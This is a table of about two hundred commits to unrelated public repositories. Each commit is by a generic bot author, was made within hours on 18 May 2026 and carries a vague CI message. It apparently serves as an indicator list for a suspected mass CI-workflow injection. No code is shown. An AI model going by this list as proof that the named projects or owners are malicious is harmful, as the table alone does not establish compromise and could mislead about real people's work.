| 3372 | omondijeff/elizabeth-weds-tobias | 95cf3a4fdbaf | pipeline-bot | [email protected] | 2026-05-18T13:09:23.000Z | chore: sync ci configuration |
| 3373 | meuthopik/zatogasu-catalogue-releases | 95db30a41e5c | build-bot | [email protected] | 2026-05-18T13:00:04.000Z | chore: sync ci configuration |
| 3374 | riomukhtarom/favorite-movie | 95dc7ee7d1f1 | build-bot | [email protected] | 2026-05-18T15:42:57.000Z | ci: add build optimization step |
| 3375 | baqar08/chem-EQB | 95e4a5f106fc | auto-ci | [email protected] | 2026-05-18T13:34:22.000Z | chore: update ci/cd pipeline |
| 3376 | Dejlof/OloEcommFrontend | 95ec96439dab | auto-ci | [email protected] | 2026-05-18T15:52:22.000Z | chore: update ci/cd pipeline |
| 3377 | vansh7266/pharmai | 95f1f0ea4b08 | auto-ci | [email protected] | 2026-05-18T16:56:39.000Z | ci: update build config |
| 3378 | blhomstein/one_week_project | 960a2ba6c2d6 | auto-ci | [email protected] | 2026-05-18T13:03:12.000Z | build: improve ci performance |
| 3379 | Ericooi997/dynamic-qr-gateway | 960ff4fb1ce1 | pipeline-bot | [email protected] | 2026-05-18T13:01:55.000Z | ci: add build optimization step |
| 3380 | praktikum-java/spring-core-example | 961df3a01d38 | ci-bot | [email protected] | 2026-05-18T13:56:22.000Z | build: improve ci performance |
| 3381 | varunvaghasiya11/Day-3-challange | 961f67492262 | pipeline-bot | [email protected] | 2026-05-18T13:54:48.000Z | fix: correct build workflow |
| 3382 | alexmagwe/videos-organizer | 96231656a5d8 | build-bot | [email protected] | 2026-05-18T12:59:44.000Z | fix: correct build workflow |
| 3383 | Team-ADAPT/NewsScope | 9649eb75d524 | ci-bot | [email protected] | 2026-05-18T16:26:10.000Z | ci: update build config |
| 3384 | elmizan/cmslite | 96568191a68f | pipeline-bot | [email protected] | 2026-05-18T11:47:04.000Z | chore: optimize pipeline runtime |
| 3385 | MoustafaElsaghier/JumpSearch | 9656a0acb6e5 | build-bot | [email protected] | 2026-05-18T15:36:30.000Z | ci: add build optimization step |
| 3386 | yashlad27/PYXMYSQL | 9657a7c308af | ci-bot | [email protected] | 2026-05-18T13:28:36.000Z | ci: update build config |
| 3387 | B-andir/Web-Development-Examination-Project | 9660f1a59d44 | pipeline-bot | [email protected] | 2026-05-18T16:59:26.000Z | chore: optimize pipeline runtime |
| 3388 | arj1211/px-palette | 966eef8278dd | build-bot | [email protected] | 2026-05-18T15:39:56.000Z | chore: update ci/cd pipeline |
| 3389 | thebenmerlin/Formula1 | 96818baa2645 | pipeline-bot | [email protected] | 2026-05-18T12:14:49.000Z | ci: update build config |
| 3390 | ai-dev-god/site-mita | 968bcc9944f8 | auto-ci | [email protected] | 2026-05-18T14:35:13.000Z | ci: update build config |
| 3391 | trixobird/pumapay-server | 969f97a131b0 | pipeline-bot | [email protected] | 2026-05-18T14:45:52.000Z | ci: add build optimization step |
| 3392 | Wanghley/inboxify | 96ab8f49e382 | auto-ci | [email protected] | 2026-05-18T14:22:13.000Z | fix: correct build workflow |
| 3393 | RaoMehdiHassan/Calculator | 96bf73778d89 | build-bot | [email protected] | 2026-05-18T13:29:15.000Z | chore: sync ci configuration |
| 3394 | Srj-Love/native_comm | 96c967f847a0 | auto-ci | [email protected] | 2026-05-18T12:49:27.000Z | chore: update ci/cd pipeline |
| 3395 | EnamulBokshi/skillbridge-server | 96c9d5052130 | build-bot | [email protected] | 2026-05-18T15:29:16.000Z | chore: sync ci configuration |
| 3396 | vahitkeskin/FenceCalculator | 96d9976ad712 | auto-ci | [email protected] | 2026-05-18T13:21:26.000Z | ci: add build optimization step |
| 3397 | MoustafaElsaghier/AppsSquare | 96df5ef5d56b | pipeline-bot | [email protected] | 2026-05-18T15:38:22.000Z | ci: add build optimization step |
| 3398 | marfiandhi/Lab-RPL-Unhas | 96e9e28e81e7 | ci-bot | [email protected] | 2026-05-18T15:43:38.000Z | chore: optimize pipeline runtime |
| 3399 | CTSE-assignment-02/code-plus | 9702a62d5350 | ci-bot | [email protected] | 2026-05-18T13:52:51.000Z | chore: update ci/cd pipeline |
| 3400 | coolman669521/skills-copilot-codespaces-vscode | 97079e0e7b57 | build-bot | [email protected] | 2026-05-18T12:51:01.000Z | chore: sync ci configuration |
| 3401 | nmschoolcraft/psg | 971f019321b8 | pipeline-bot | [email protected] | 2026-05-18T11:43:06.000Z | chore: update ci/cd pipeline |
| 3402 | Barimakers/Corso__Arduino_Base | 972ea7cbf90e | ci-bot | [email protected] | 2026-05-18T12:55:06.000Z | chore: sync ci configuration |
| 3403 | Wookie3/sockie-talkie | 9733475a3139 | ci-bot | [email protected] | 2026-05-18T16:29:15.000Z | build: improve ci performance |
| 3404 | loaykhalifa/Back-to-Close-Tab | 974ed0c0b06b | auto-ci | [email protected] | 2026-05-18T13:46:43.000Z | ci: update build config |
| 3405 | yashlad27/test-action-1778963955618593106 | 975633631ba2 | pipeline-bot | [email protected] | 2026-05-18T13:15:09.000Z | ci: update build config |
| 3406 | yashlad27/SummerScout25 | 975db3cfd251 | ci-bot | [email protected] | 2026-05-18T13:25:19.000Z | ci: update build config |
| 3407 | naytanvieira/nlw-return | 975e06b5f02a | build-bot | [email protected] | 2026-05-18T15:13:25.000Z | chore: sync ci configuration |
| 3408 | antonix217/skillcheck | 97624a1bbf84 | build-bot | [email protected] | 2026-05-18T12:00:57.000Z | chore: update ci/cd pipeline |
| 3409 | abdulkerimakten/body_sign_language_to_morse_code | 9765989dab2e | build-bot | [email protected] | 2026-05-18T13:34:20.000Z | ci: add build optimization step |
| 3410 | kmucs-jinseon/webservercomputing-qna-site | 976864dccaad | build-bot | [email protected] | 2026-05-18T12:48:05.000Z | chore: optimize pipeline runtime |
| 3411 | Yousif-12/test-action-1778966161964425426 | 9771e5c57ef5 | pipeline-bot | [email protected] | 2026-05-18T13:27:38.000Z | ci: update build config |
| 3412 | MoustafaElsaghier/CreativeMindsTask | 9793fe23f6b3 | build-bot | [email protected] | 2026-05-18T15:35:02.000Z | ci: update build config |
| 3413 | the-stratocoder/api-tests | 97a5c28a770a | ci-bot | [email protected] | 2026-05-18T12:31:20.000Z | ci: update build config |
| 3414 | Ashwiin/LeetCode-0088 | 97b78e2b2d03 | build-bot | [email protected] | 2026-05-18T16:49:34.000Z | build: improve ci performance |
| 3415 | kkinch420/test-action-1779100876911515593 | 97b7fc706d08 | auto-ci | [email protected] | 2026-05-18T13:17:50.000Z | ci: update build config |
| 3416 | akashcruz/test-action-1779100876567073683 | 97cc1944479e | build-bot | [email protected] | 2026-05-18T13:03:29.000Z | chore: sync ci configuration |
| 3417 | RameshRukshan/Alanwcode | 98033016e1db | ci-bot | [email protected] | 2026-05-18T17:46:10.000Z | ci: add build optimization step |
| 3418 | EnochBanda/nacit-project- | 9804fe2bc9f2 | pipeline-bot | [email protected] | 2026-05-18T16:28:08.000Z | chore: update ci/cd pipeline |
| 3419 | briannecmcknight/briannecmcknight.github.io | 9819882d5fde | pipeline-bot | [email protected] | 2026-05-18T16:52:37.000Z | fix: correct build workflow |
| 3420 | EnamulBokshi/python | 98208773b7e0 | ci-bot | [email protected] | 2026-05-18T15:35:18.000Z | chore: optimize pipeline runtime |
| 3421 | Raja244/Agumentik_Raja_12209471 | 983e3666eb9e | build-bot | [email protected] | 2026-05-18T15:48:33.000Z | ci: update build config |
| 3422 | NicolNonga/FirstIosApp | 98542002cf35 | build-bot | [email protected] | 2026-05-18T12:18:51.000Z | chore: update ci/cd pipeline |
| 3423 | praktikum-java/emojicon-work-rev-2 | 98626aa296f1 | build-bot | [email protected] | 2026-05-18T13:53:34.000Z | fix: correct build workflow |
| 3424 | RameshRukshan/SLNSSCEB_webDashboars | 9863a4cf29cf | pipeline-bot | [email protected] | 2026-05-18T17:44:28.000Z | fix: correct build workflow |
| 3425 | usoler/BookplannerProject | 98689053275a | auto-ci | [email protected] | 2026-05-18T12:11:15.000Z | build: improve ci performance |
| 3426 | Stat184-Spring2025/Course_Project_JoshStremmel_JooanChoi_NamrataSingh | 986dc17fd666 | auto-ci | [email protected] | 2026-05-18T12:09:46.000Z | build: improve ci performance |
| 3427 | deploy11/easyshop2 | 986e88f87b9f | build-bot | [email protected] | 2026-05-18T11:54:26.000Z | fix: correct build workflow |
| 3428 | AmarKumarShaw/arpan_youtube_clone | 9883a41c2206 | auto-ci | [email protected] | 2026-05-18T12:14:22.000Z | build: improve ci performance |
| 3429 | moonlightKiR/MD002-E2 | 98b5e04053d8 | build-bot | [email protected] | 2026-05-18T12:22:50.000Z | chore: optimize pipeline runtime |
| 3430 | vansh7266/panoptic_studio | 98cfb0952181 | auto-ci | [email protected] | 2026-05-18T16:54:17.000Z | chore: sync ci configuration |
| 3431 | fa-ssec/DSfarm-flutter | 98e5f3348cd9 | auto-ci | [email protected] | 2026-05-18T16:06:53.000Z | ci: add build optimization step |
| 3432 | Davidf2004/test-action-1778957958829736698 | 98e7d4c82cb3 | ci-bot | [email protected] | 2026-05-18T17:01:38.000Z | ci: update build config |
| 3433 | patrykszczepanski/easy-money-management-system | 98ee3944a8d6 | pipeline-bot | [email protected] | 2026-05-18T14:30:54.000Z | chore: sync ci configuration |
| 3434 | EnamulBokshi/ph-assignment-1 | 98faa0f0ced5 | pipeline-bot | [email protected] | 2026-05-18T15:30:25.000Z | chore: update ci/cd pipeline |
| 3435 | RobertLlb/cli_task_manager | 990a6597c3a5 | ci-bot | [email protected] | 2026-05-18T14:33:20.000Z | chore: sync ci configuration |
| 3436 | yashlad27/pokercpp | 991a0de62ae7 | auto-ci | [email protected] | 2026-05-18T13:25:08.000Z | chore: update ci/cd pipeline |
| 3437 | Anthony-Mwangi-DQ/test-action-1778960008495670876 | 991e492cf398 | pipeline-bot | [email protected] | 2026-05-18T13:32:58.000Z | chore: sync ci configuration |
| 3438 | CHESSComputing/scripts | 992181bdf346 | auto-ci | [email protected] | 2026-05-18T13:44:54.000Z | chore: optimize pipeline runtime |
| 3439 | DipeshSinghNegi/DipeshSinghNegi | 9940cfe85eb7 | pipeline-bot | [email protected] | 2026-05-18T12:09:40.000Z | chore: optimize pipeline runtime |
| 3440 | Kujo-f/odin-recipes | 994a358b9c89 | pipeline-bot | [email protected] | 2026-05-18T11:56:01.000Z | chore: update ci/cd pipeline |
| 3441 | Davidf2004/NewsApp | 994cfc16d074 | pipeline-bot | [email protected] | 2026-05-18T17:09:26.000Z | chore: update ci/cd pipeline |
| 3442 | ShaileshS237/placementapp | 995022f582b6 | build-bot | [email protected] | 2026-05-18T16:57:59.000Z | chore: optimize pipeline runtime |
| 3443 | ConnectSiteForge/docs-gs1a4c | 996e5bfa729f | build-bot | [email protected] | 2026-05-18T14:34:59.000Z | chore: sync ci configuration |
| 3444 | Petalon/DjangoProject | 997ec448ee97 | pipeline-bot | [email protected] | 2026-05-18T12:10:17.000Z | chore: optimize pipeline runtime |
| 3445 | Zawad838/iht-full-project | 998d3f58063c | auto-ci | [email protected] | 2026-05-18T16:28:25.000Z | ci: add build optimization step |
| 3446 | ankitnagar34/DevTinder-MAJOR | 999ab929100a | ci-bot | [email protected] | 2026-05-18T16:13:59.000Z | chore: update ci/cd pipeline |
| 3447 | alexmagwe/alexmagwe.github.io | 999b41651510 | pipeline-bot | [email protected] | 2026-05-18T13:03:01.000Z | fix: correct build workflow |
| 3448 | Kujo-f/Django | 999cfb25b8d2 | build-bot | [email protected] | 2026-05-18T11:55:49.000Z | chore: sync ci configuration |
| 3449 | Harshit2510745/JC-LABS- | 99b1d568d238 | auto-ci | [email protected] | 2026-05-18T12:58:05.000Z | chore: update ci/cd pipeline |
| 3450 | Dhruvil-ux106/WAP-Group-Project | 99b7018a0505 | ci-bot | [email protected] | 2026-05-18T12:50:27.000Z | ci: add build optimization step |
| 3451 | thanhnq2/Node-js-upload-file- | 99b7348070f6 | build-bot | [email protected] | 2026-05-18T12:46:09.000Z | ci: update build config |
| 3452 | cdemir7/DocTalk | 99c585d31e9b | auto-ci | [email protected] | 2026-05-18T14:01:09.000Z | ci: update build config |
| 3453 | Raysharr/nimiq-miner-setup | 99cd08a5351c | auto-ci | [email protected] | 2026-05-18T12:34:33.000Z | chore: sync ci configuration |
| 3454 | unbankedgroup/winobell | 99ce3e202b8c | build-bot | [email protected] | 2026-05-18T11:54:40.000Z | ci: add build optimization step |
| 3455 | kritikhatri/html | 99dd45caf8b7 | build-bot | [email protected] | 2026-05-18T15:36:28.000Z | chore: sync ci configuration |
| 3456 | vkuznet/k8snodemon | 99e66841dd13 | ci-bot | [email protected] | 2026-05-18T13:41:42.000Z | ci: update build config |
| 3457 | Manthankachhadiya/test-action-1778957508618977370 | 99e8bfcfbc83 | ci-bot | [email protected] | 2026-05-18T16:08:42.000Z | ci: update build config |
| 3458 | vahitkeskin/iamvahitkeskin | 9a0d37cd5239 | ci-bot | [email protected] | 2026-05-18T13:05:10.000Z | chore: sync ci configuration |
| 3459 | pranto2051/Ai_Aria_Agent | 9a103ecb424a | ci-bot | [email protected] | 2026-05-18T14:07:27.000Z | build: improve ci performance |
| 3460 | rajanyadav80/test-action-1778957508078621341 | 9a1474681a71 | ci-bot | [email protected] | 2026-05-18T13:06:46.000Z | ci: update build config |
| 3461 | DellerbaRobotics/Pad_Control | 9a2029aac071 | ci-bot | [email protected] | 2026-05-18T12:52:14.000Z | ci: add build optimization step |
| 3462 | lucky-hw-kim/ShoppingCart | 9a2a84a7ff2f | pipeline-bot | [email protected] | 2026-05-18T12:41:29.000Z | chore: sync ci configuration |
| 3463 | elmizan/siakadyii2 | 9a2d6adea974 | auto-ci | [email protected] | 2026-05-18T11:46:07.000Z | build: improve ci performance |
| 3464 | ibrahiemhss/mvc_boilerplate | 9a34999a6c89 | auto-ci | [email protected] | 2026-05-18T14:05:11.000Z | chore: optimize pipeline runtime |
| 3465 | 10014Rebellion/2024-slotmachine-main | 9a457d9a9bab | pipeline-bot | [email protected] | 2026-05-18T13:52:53.000Z | build: improve ci performance |
| 3466 | phase23/thermalprint | 9a56ca1fdf57 | pipeline-bot | [email protected] | 2026-05-18T11:46:02.000Z | chore: sync ci configuration |
| 3467 | theabhinavpal/hatched-photography | 9a5fb17a9eca | pipeline-bot | [email protected] | 2026-05-18T15:59:15.000Z | chore: optimize pipeline runtime |
| 3468 | ANDREWTENAJEROS/tenajeros-elect1 | 9a682096f9f9 | build-bot | [email protected] | 2026-05-18T16:12:25.000Z | build: improve ci performance |
| 3469 | Devam0416/SuperMarket-Smart-Manager-C-Project | 9a852478d453 | pipeline-bot | [email protected] | 2026-05-18T15:33:45.000Z | build: improve ci performance |
| 3470 | alexmagwe/Keplogs | 9a85e0595dd0 | pipeline-bot | [email protected] | 2026-05-18T13:00:38.000Z | chore: optimize pipeline runtime |
| 3471 | smallziz18/NextGen-fastapi-bank | 9a864c720c05 | pipeline-bot | [email protected] | 2026-05-18T12:07:23.000Z | chore: sync ci configuration |
| 3472 | ecoysoft-env/meraj | 9aa5ecd46cc5 | auto-ci | [email protected] | 2026-05-18T14:17:21.000Z | build: improve ci performance |
| 3473 | varunvaghasiya11/Node_Exam | 9aa6c8badb29 | ci-bot | [email protected] | 2026-05-18T13:56:11.000Z | build: improve ci performance |
| 3474 | varunvaghasiya11/Mock_Intrview_ | 9ab8970379e3 | ci-bot | [email protected] | 2026-05-18T13:55:56.000Z | ci: update build config |
| 3475 | moritzkrause/mygard | 9abb3abf3d7d | pipeline-bot | [email protected] | 2026-05-18T12:40:25.000Z | chore: sync ci configuration |
| 3476 | RameshRukshan/ReactBeginner-Project | 9acf5410797f | pipeline-bot | [email protected] | 2026-05-18T17:36:37.000Z | chore: optimize pipeline runtime |
| 3477 | Harshit2510745/Express.js- | 9adb7f0efd2b | ci-bot | [email protected] | 2026-05-18T13:00:46.000Z | chore: sync ci configuration |
| 3478 | jenish-prog/calculator | 9ae89fe53673 | pipeline-bot | [email protected] | 2026-05-18T14:03:51.000Z | ci: add build optimization step |
| 3479 | SuyeongUeno/FastAPI | 9b02cb029c71 | build-bot | [email protected] | 2026-05-18T17:06:13.000Z | chore: sync ci configuration |
| 3480 | AbhishekAnamala/test-action-1779106619293224812 | 9b0705ffdee0 | pipeline-bot | [email protected] | 2026-05-18T16:10:19.000Z | build: improve ci performance |
| 3481 | Udbhav-2025/udbhav-ht100-ga-021 | 9b10670a262a | ci-bot | [email protected] | 2026-05-18T13:05:34.000Z | ci: add build optimization step |
| 3482 | RameshRukshan/My-first-website | 9b1bf88eb71f | pipeline-bot | [email protected] | 2026-05-18T17:47:29.000Z | chore: update ci/cd pipeline |
| 3483 | naveenld024/country_picker_flutter_plus | 9b25d1128e89 | pipeline-bot | [email protected] | 2026-05-18T13:28:21.000Z | ci: update build config |
| 3484 | Kujo-f/django_ll | 9b36d9e03dea | pipeline-bot | [email protected] | 2026-05-18T11:54:06.000Z | chore: update ci/cd pipeline |
| 3485 | KryptonZQ/foaiendsem | 9b3888766296 | pipeline-bot | [email protected] | 2026-05-18T12:50:04.000Z | chore: sync ci configuration |
| 3486 | akashcruz/hand-written-digit-recognition | 9b43610e5cb0 | pipeline-bot | [email protected] | 2026-05-18T13:07:05.000Z | ci: update build config |
| 3487 | umairabhatti786/WireframeNelution | 9b49a5a6f773 | build-bot | [email protected] | 2026-05-18T12:51:54.000Z | chore: optimize pipeline runtime |
| 3488 | pranto2051/crom_-extension_one | 9b4b01fd329a | ci-bot | [email protected] | 2026-05-18T14:07:46.000Z | chore: optimize pipeline runtime |
| 3489 | pooooriya/Exchanger | 9b56ccdf9d31 | auto-ci | [email protected] | 2026-05-18T12:54:47.000Z | build: improve ci performance |
| 3490 | Enriiquecm/Presentacion_dual | 9b5ab16a9988 | ci-bot | [email protected] | 2026-05-18T13:27:51.000Z | fix: correct build workflow |
| 3491 | just-abdullah-dev/spring-boot-rest-api-basic-lab4 | 9b707a38e108 | build-bot | [email protected] | 2026-05-18T13:55:22.000Z | chore: sync ci configuration |
| 3492 | thebenmerlin/niranjan | 9b79c59949d7 | ci-bot | [email protected] | 2026-05-18T12:19:13.000Z | chore: sync ci configuration |
| 3493 | CHESSComputing/golib | 9b7a5c7301e3 | build-bot | [email protected] | 2026-05-18T13:40:47.000Z | chore: update ci/cd pipeline |
| 3494 | kayosama007/ci-build-20260329-185852-3563 | 9b804156e438 | build-bot | [email protected] | 2026-05-18T14:25:27.000Z | ci: add build optimization step |
| 3495 | c0der0jal/4thSEM | 9b906d955512 | auto-ci | [email protected] | 2026-05-18T12:54:18.000Z | ci: add build optimization step |
| 3496 | ZunsodB/Anand-Khujirt | 9b9e41812a19 | build-bot | [email protected] | 2026-05-18T16:23:00.000Z | ci: update build config |
| 3497 | motorical-smtp/motorical-smtp-examples | 9ba19d10f21f | pipeline-bot | [email protected] | 2026-05-18T16:45:01.000Z | ci: update build config |
| 3498 | SaraNabil/Student_management_app | 9bbac736ba45 | ci-bot | [email protected] | 2026-05-18T16:14:06.000Z | chore: update ci/cd pipeline |
| 3499 | vagabondism/fetris | 9bdc12ce79b0 | auto-ci | [email protected] | 2026-05-18T12:37:01.000Z | chore: optimize pipeline runtime |
| 3500 | moritzkrause/moritzkrause | 9bdfacbbbe3e | auto-ci | [email protected] | 2026-05-18T12:40:20.000Z | ci: update build config |
| 3501 | Devanshu-code/PHC_351 | 9be940c76059 | ci-bot | [email protected] | 2026-05-18T13:42:41.000Z | ci: add build optimization step |
| 3502 | ConnectSiteForge/SiteForge | 9bf44134ccc1 | pipeline-bot | [email protected] | 2026-05-18T14:36:47.000Z | ci: add build optimization step |
| 3503 | ZunsodB/GreenRoom-Backend | 9bfac549e769 | pipeline-bot | [email protected] | 2026-05-18T16:24:25.000Z | chore: sync ci configuration |
| 3504 | AmanWorku/AmanWorku.github.io | 9c11b29113d2 | ci-bot | [email protected] | 2026-05-18T12:20:20.000Z | ci: update build config |
| 3505 | dyna-glitch/GitBurger | 9c1a661da8ab | pipeline-bot | [email protected] | 2026-05-18T15:29:20.000Z | chore: update ci/cd pipeline |
| 3506 | Husam-AbuZina/Hamamm-Portfolio | 9c1bd3c82a5b | ci-bot | [email protected] | 2026-05-18T12:22:00.000Z | chore: sync ci configuration |
| 3507 | Wanghley/FGPA-CPU | 9c1e03aee3aa | ci-bot | [email protected] | 2026-05-18T14:24:49.000Z | chore: update ci/cd pipeline |
| 3508 | bishaldahal4777/file-upload | 9c2cd1f931f4 | build-bot | [email protected] | 2026-05-18T13:29:08.000Z | fix: correct build workflow |
| 3509 | izabayo7/cppbasicvotingsystem | 9c38adbeb39c | ci-bot | [email protected] | 2026-05-18T13:20:27.000Z | chore: optimize pipeline runtime |
| 3510 | saradune6/Text-To-Audio | 9c38d998a334 | ci-bot | [email protected] | 2026-05-18T13:01:35.000Z | fix: correct build workflow |
| 3511 | Sushanth18052005/Breast_Cancer_Detection_Visualization | 9c469c067bbf | ci-bot | [email protected] | 2026-05-18T12:01:07.000Z | chore: update ci/cd pipeline |
| 3512 | RUN-TECH-SPACE/RuntechspaceNew | 9c52ba65691c | build-bot | [email protected] | 2026-05-18T17:38:44.000Z | fix: correct build workflow |
| 3513 | Debbatisudheer/Multi-Agent-To-Do-Planner | 9c5b367e7be8 | auto-ci | [email protected] | 2026-05-18T17:04:23.000Z | build: improve ci performance |
| 3514 | Wookie3/i386-Python-emulator | 9c607c2d5df7 | auto-ci | [email protected] | 2026-05-18T16:29:09.000Z | fix: correct build workflow |
| 3515 | sj123r/Swift_Project | 9c7cd8a9377c | ci-bot | [email protected] | 2026-05-18T13:45:04.000Z | chore: optimize pipeline runtime |
| 3516 | Exp-Intro-to-GitHub-Flow-Cohort-1/series-intro-to-github-flow-briannecmcknight | 9c81fbe4b1ec | ci-bot | [email protected] | 2026-05-18T16:57:15.000Z | ci: add build optimization step |
| 3517 | deploy11/none | 9c8995473e7b | build-bot | [email protected] | 2026-05-18T11:50:22.000Z | ci: update build config |
| 3518 | pranto2051/PHP | 9c8eb668d888 | auto-ci | [email protected] | 2026-05-18T14:14:28.000Z | ci: update build config |
| 3519 | Akisan98/.bravnie | 9c95a5580adf | build-bot | [email protected] | 2026-05-18T14:06:29.000Z | fix: correct build workflow |
| 3520 | Viraj1635/quizz_app | 9ca41070e35e | pipeline-bot | [email protected] | 2026-05-18T12:10:06.000Z | chore: optimize pipeline runtime |
| 3521 | nebink/test-action-1778960691875385856 | 9cb0bef000d0 | pipeline-bot | [email protected] | 2026-05-18T12:13:11.000Z | ci: update build config |
| 3522 | l8yh1/Messenger-Bot-Creator | 9cb16d515487 | auto-ci | [email protected] | 2026-05-18T17:14:57.000Z | chore: update ci/cd pipeline |
| 3523 | floriwa/test-action-1779116808763303272 | 9cc0b14e0b04 | build-bot | [email protected] | 2026-05-18T12:34:21.000Z | chore: sync ci configuration |
| 3524 | hahaha-zsq/winter-local-message-spring-boot-starter | 9cdab4b9a237 | pipeline-bot | [email protected] | 2026-05-18T12:14:22.000Z | ci: update build config |
| 3525 | Akisan98/encrypted | 9cf0a9d2b51d | auto-ci | [email protected] | 2026-05-18T14:04:57.000Z | chore: sync ci configuration |
| 3526 | justin0427/imac-lab-site | 9cf9024d82e4 | auto-ci | [email protected] | 2026-05-18T13:09:14.000Z | ci: update build config |
| 3527 | An63llvs/test-action-1778957958896159285 | 9d194bc348da | build-bot | [email protected] | 2026-05-18T12:13:37.000Z | chore: sync ci configuration |
| 3528 | YSH1214/farmer | 9d2c16bc5760 | build-bot | [email protected] | 2026-05-18T17:12:42.000Z | ci: add build optimization step |
| 3529 | l8yh1/kamix | 9d34b978fd5d | ci-bot | [email protected] | 2026-05-18T17:22:31.000Z | chore: sync ci configuration |
| 3530 | git-init-priyanshu/web3-wallet | 9d39caad4937 | build-bot | [email protected] | 2026-05-18T16:54:29.000Z | ci: update build config |
| 3531 | tmam-dev/tmam | 9d3a1abaf2b1 | auto-ci | [email protected] | 2026-05-18T14:47:12.000Z | ci: update build config |
| 3532 | pranto2051/Online-voting-system-University-project | 9d4a1510e402 | build-bot | [email protected] | 2026-05-18T14:14:14.000Z | fix: correct build workflow |
| 3533 | kelvinsinsua/problema2-reactjs-frontend | 9d4e93df4551 | auto-ci | [email protected] | 2026-05-18T17:44:00.000Z | chore: update ci/cd pipeline |
| 3534 | mahbubur1rahman/test-action-1778960008066968446 | 9d50c18aa552 | ci-bot | [email protected] | 2026-05-18T16:35:11.000Z | fix: correct build workflow |
| 3535 | decemberfm/tinmen-testing | 9d63e4599cd2 | build-bot | [email protected] | 2026-05-18T17:15:43.000Z | chore: optimize pipeline runtime |
| 3536 | senithudara/grind-fe | 9d65aa289688 | auto-ci | [email protected] | 2026-05-18T14:05:01.000Z | chore: update ci/cd pipeline |
| 3537 | charanamith/charan-amith | 9d6c9c66a535 | ci-bot | [email protected] | 2026-05-18T17:06:00.000Z | chore: update ci/cd pipeline |
| 3538 | rahulbohra57/Resume-Match-GenAI | 9d727a337478 | ci-bot | [email protected] | 2026-05-18T16:34:14.000Z | build: improve ci performance |
| 3539 | David-Irihose/alu-webstack | 9d72f1abc148 | auto-ci | [email protected] | 2026-05-18T13:26:52.000Z | chore: update ci/cd pipeline |
| 3540 | mosesnkoromo/crypto_top_gainer | 9d7bb9acfb73 | ci-bot | [email protected] | 2026-05-18T13:07:11.000Z | build: improve ci performance |
| 3541 | riomukhtarom/weather | 9d7eb1e797b5 | auto-ci | [email protected] | 2026-05-18T15:42:47.000Z | build: improve ci performance |
| 3542 | Rezasz/ghawazi | 9d8644250ac8 | pipeline-bot | [email protected] | 2026-05-18T13:28:37.000Z | ci: update build config |
| 3543 | tacmatic/meta | 9daf225a2bf9 | auto-ci | [email protected] | 2026-05-18T12:47:15.000Z | chore: optimize pipeline runtime |
| 3544 | anashameed446-netizen/Top25Coins | 9db98c96fcb3 | build-bot | [email protected] | 2026-05-18T16:12:55.000Z | chore: optimize pipeline runtime |
| 3545 | azimsidd/test | 9dc596b86bc2 | ci-bot | [email protected] | 2026-05-18T13:26:07.000Z | fix: correct build workflow |
| 3546 | dpaetsch/Impossible-Spaces-VR | 9dc826219e70 | ci-bot | [email protected] | 2026-05-18T13:30:42.000Z | ci: add build optimization step |
| 3547 | Wang200935/OpenClaw-User-Manual | 9dd69bb730c2 | auto-ci | [email protected] | 2026-05-18T13:26:40.000Z | ci: update build config |
| 3548 | osamahkenawy/trasealla | 9de265f84797 | ci-bot | [email protected] | 2026-05-18T15:18:05.000Z | build: improve ci performance |
| 3549 | GymBuddies4/Gym-Buddy | 9e08045a45b5 | build-bot | [email protected] | 2026-05-18T12:09:51.000Z | build: improve ci performance |
| 3550 | Rijo2665/Test | 9e19f8afb11f | build-bot | [email protected] | 2026-05-18T12:26:29.000Z | chore: optimize pipeline runtime |
| 3551 | rajanyadav80/portfolio-website | 9e2088630f68 | build-bot | [email protected] | 2026-05-18T13:06:51.000Z | ci: update build config |
| 3552 | ReefSense-RP-25-26J-486/reefsense-node-app | 9e2ab7324552 | pipeline-bot | [email protected] | 2026-05-18T13:52:34.000Z | chore: optimize pipeline runtime |
| 3553 | alanmunoz25/Ionic-Firebase-CRUD | 9e2d909b51bb | build-bot | [email protected] | 2026-05-18T14:27:47.000Z | chore: sync ci configuration |
| 3554 | NicolNonga/logger_module | 9e383a621615 | auto-ci | [email protected] | 2026-05-18T12:22:12.000Z | chore: update ci/cd pipeline |
| 3555 | RuchirKadam1729/autograder-miniproj | 9e3a517291ff | build-bot | [email protected] | 2026-05-18T12:56:58.000Z | build: improve ci performance |
| 3556 | elenecu/node-webrest-server | 9e3fc41c21d9 | pipeline-bot | [email protected] | 2026-05-18T16:08:31.000Z | ci: add build optimization step |
| 3557 | CHESSComputing/ClasseInfoService | 9e43dda28de3 | ci-bot | [email protected] | 2026-05-18T13:38:04.000Z | build: improve ci performance |
| 3558 | patrykszczepanski/golang-openapi-boilerplate | 9e457398a886 | ci-bot | [email protected] | 2026-05-18T14:34:11.000Z | chore: optimize pipeline runtime |
| 3559 | WIZnet-ioNIC/WIZnet-PICO-AZURE-C | 9e4fc9768fb1 | build-bot | [email protected] | 2026-05-18T16:29:05.000Z | chore: optimize pipeline runtime |
| 3560 | BryanAlexanderSantoso/EcomGuard | 9e5573ab0755 | ci-bot | [email protected] | 2026-05-18T13:46:58.000Z | chore: sync ci configuration |
| 3561 | AcerCristea/CMPM121Project | 9e5dab7bb9db | auto-ci | [email protected] | 2026-05-18T16:08:55.000Z | ci: add build optimization step |
| 3562 | ZunsodB/SmartHome | 9e5e397147eb | pipeline-bot | [email protected] | 2026-05-18T16:24:38.000Z | chore: optimize pipeline runtime |
| 3563 | AmanWorku/Catalog-Ruby | 9e6be75cfc0e | build-bot | [email protected] | 2026-05-18T12:27:16.000Z | build: improve ci performance |
| 3564 | PrafulParmar01/library | 9e6bf0c32af7 | build-bot | [email protected] | 2026-05-18T13:35:28.000Z | fix: correct build workflow |
| 3565 | aj-techsoul/zktecocontrol | 9e8a2be70d2a | build-bot | [email protected] | 2026-05-18T13:44:55.000Z | ci: add build optimization step |
| 3566 | noushiFlex/WaveImpactSimulation | 9e96d7e8f5eb | build-bot | [email protected] | 2026-05-18T17:37:25.000Z | chore: update ci/cd pipeline |
| 3567 | sahidDev09/INK-Library-react | 9e9a6cc8091b | ci-bot | [email protected] | 2026-05-18T16:11:32.000Z | build: improve ci performance |
| 3568 | jenish-prog/rank-ascend | 9ea99d58b053 | auto-ci | [email protected] | 2026-05-18T14:10:18.000Z | fix: correct build workflow |
| 3569 | saradune6/Node-Puppeteer-googleMap-scrapping-py | 9eaf8d98e493 | build-bot | [email protected] | 2026-05-18T13:00:13.000Z | ci: add build optimization step |
| 3570 | royai-tw/voiceclaw | 9ebc6002f57c | auto-ci | [email protected] | 2026-05-18T14:35:31.000Z | chore: sync ci configuration |
